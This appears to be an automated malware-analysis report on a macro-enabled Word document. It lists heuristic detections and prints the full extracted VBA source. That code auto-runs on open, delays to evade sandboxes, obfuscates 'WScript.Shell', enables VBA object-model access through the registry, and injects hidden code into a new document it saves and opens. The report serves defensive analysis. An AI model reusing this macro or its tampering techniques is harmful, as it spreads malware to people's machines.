Malware Insights
The sample contains VBA macros that execute upon opening the document, as indicated by the 'documeNt_opEn' subroutine. The macro constructs a string 'WScript.Shell' to create a Windows Script Host object, which is then used to write a value to the registry key HKCU\Software\Microsoft\Office\16.0\Word\Security\AccessVBOM. This action likely aims to enable programmatic access to the VBA object model, potentially to facilitate further malicious actions or persistence. The macro also attempts to save the document and then opens a new document, suggesting a downloader or dropper functionality.
Heuristics (7)

- VBA project inside OOXML (medium, 4 related findings, OOXML_VBA): Document contains a VBA project — VBA macros present.
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature. Matched line in script: `doc.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString "Sub goods() : : End Sub" & vbCrLf & "Sub baads() : : End Sub" & vbCrLf & danger()`
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `Set wsl = CreateObject(strng)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched line in script: `Sub documeNt_opEn()`
- External hyperlinks (2) (low, OOXML_EXTERNAL_HYPERLINKS): Document contains 2 external hyperlinks — clickable URLs are stored as external relationships. First target: mailto:m.madelkhanov@mfa.kz
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1974 bytes | cab6f078d1ea32030ccaca88a921f8f4c4080728d12ffb69057d8383fa7fa431 |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public objApp, wsl
Function danger()
danger = ActiveDocument.Variables.Item("s2")
End Function
Function rundoc(namedoc)
Set doc2 = objApp.Documents.Open(namedoc)
doc2.Save
doc2.Close
End Function
Sub verydanger()
strng = "WSc" & "ript.She"
strng = strng & "ll"
Set wsl = CreateObject(strng)
wsl.RegWrite "HK" & "CU\Softw" & "are\Micr" & "osoft\Of" & "fice\" & Application.Version & "\Wo" & "rd\Sec" & "urity\Acce" & "ssVBO" & "M", 1, "REG_D" & "WORD"
End Sub
Sub documeNt_opEn()
On Error Resume Next
ActiveDocument.Unprotect ("oikmseM#*inmowefj8349an3")
For i = ActiveDocument.Shapes.Count To ActiveDocument.Shapes.Count + 1 - ActiveDocument.ActiveWindow.Panes(1).Pages.Count * 2 Step -1
ActiveDocument.Shapes(i).Delete
Next i
ActiveDocument.Save
sss = Now()
While Now < sss + TimeValue("00:00:20")
DoEvents
Wend
If Now() - sss < TimeValue("00:00:15") Then Exit Sub
verydanger
Set objApp = CreateObject("Word.Application")
objApp.Visible = False
Set doc = objApp.Documents.Add
For Each vars In ActiveDocument.Variables
doc.Variables.Add vars.Name & "ergegdr", vars
i = i + 1
Next
doc.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString "Sub goods() : : End Sub" & vbCrLf & "Sub baads() : : End Sub" & vbCrLf & danger()
tmp = wsl.ExpandEnvironmentStrings("%localapp" & "data%\T" & "emp")
doc.SaveAs2 tmp & "\" & ActiveDocument.Name & ".doc", 13
doc.Close
rundoc (tmp & "\" & ActiveDocument.Name & ".doc")
objApp.Quit False
End Sub
```
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 22016 bytes | e917622d343402cf0f558450f25e45658228bdeef0ff4e56f2dea08140afbc1b |